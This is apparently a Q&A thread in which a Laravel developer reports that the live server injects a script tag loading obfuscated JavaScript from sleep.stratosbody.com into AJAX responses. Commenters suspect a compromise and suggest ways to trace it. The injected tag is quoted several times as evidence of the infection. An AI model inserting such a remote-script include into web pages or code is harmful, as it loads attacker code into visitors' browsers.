# Why am i seeing a script tag in ajax response "<script src='https://sleep.stratosbody.com/scripts/head.js?v=3.8.0'></script>"

Tags: javascript, ajax, laravel

in my netork tab i can see a script head.js is being loaded and same script is showing in ajax response, because of that my success message is not showing even though my status code is 200.
Note: displayMessage function is just my toast message.
error: funcation is executing with (status code '200' as title) and ('parseerror' as message)
this only happens on my live server not on local server
here is ajax code

```
$.ajax({
                type: 'POST',
                url: "{{ route('cashier.save-order') }}",
                data: formData, // here $(this) refers to the ajax object not form
                beforeSend: function() {
                    $('#loadingSpinner').removeClass('d-none');
                },
                success: function(response) {
                    if(response.order){
                        clearAll();
                        displayMessage("success", "Order Created", "Your Order has been created");
                        $('#counter').removeClass('d-none');
                        $('#confirm').addClass('d-none');
                        $('#loadingSpinner').addClass('d-none');
                    }
                    else{
                        displayMessage("error", "Error 500", "Something went wong");
                    }
                },
                error: function(response) {
                    var {
                        title,
                        message
                    } = displayErrors(response);

                    displayMessage("error", title, message);
                    $('#loadingSpinner').addClass('d-none');

                }
            });
```

i'm using Laravel as my backend
my record is saving in my database as expected i'm returning like this from a function

```
return response()->json([
                'status' => 200,
                'order' => $order,
                'message' => "Your Order has been Placed",
            ]);
```

when i open my network tab this script is showing [Script in my network tag](https://i.stack.imgur.com/nsXma.png)
same script tag is showing in ajax response
[ajax response](https://i.stack.imgur.com/FEbJX.png)

I really appreciate the help

Comment: Well... it looks like some bad javascript has been injected. Can you try and look for it in your  entire project? Try to return just 'ok', will you still get the same javascript? How about If you change the route you post to and just return 'ok'? Keep updating your original question with those answers

Comment: After return just ok, this is my ajax response

`<script src='https://sleep.stratosbody.com/scripts/head.js?v=3.8.0'></script>"ok"`

Comment: Something is injecting that script tag there. By the looks of the contents of that script, it's probably malicious.

Comment: I'm not seeing anything related to this script in my entire project as I mentioned it is working fine on the local machine and there is no script added to either in the network tab or in my Ajax response.

Comment: Checkout https://securedstatus.com/how-to-remove-stratosbody-com/

Comment: <script src='https://sleep.stratosbody.com/scripts/head.js?v=3.8.0'></script>
The code you've provided appears to be obfuscated JavaScript code

This kind of obfuscated code is often used in malicious scripts to hide their true intent, so it should be analyzed with caution.

Comment: This might be because of weird package installed. Did you check in your composer.json and package.json if there are unfamiliar packages added?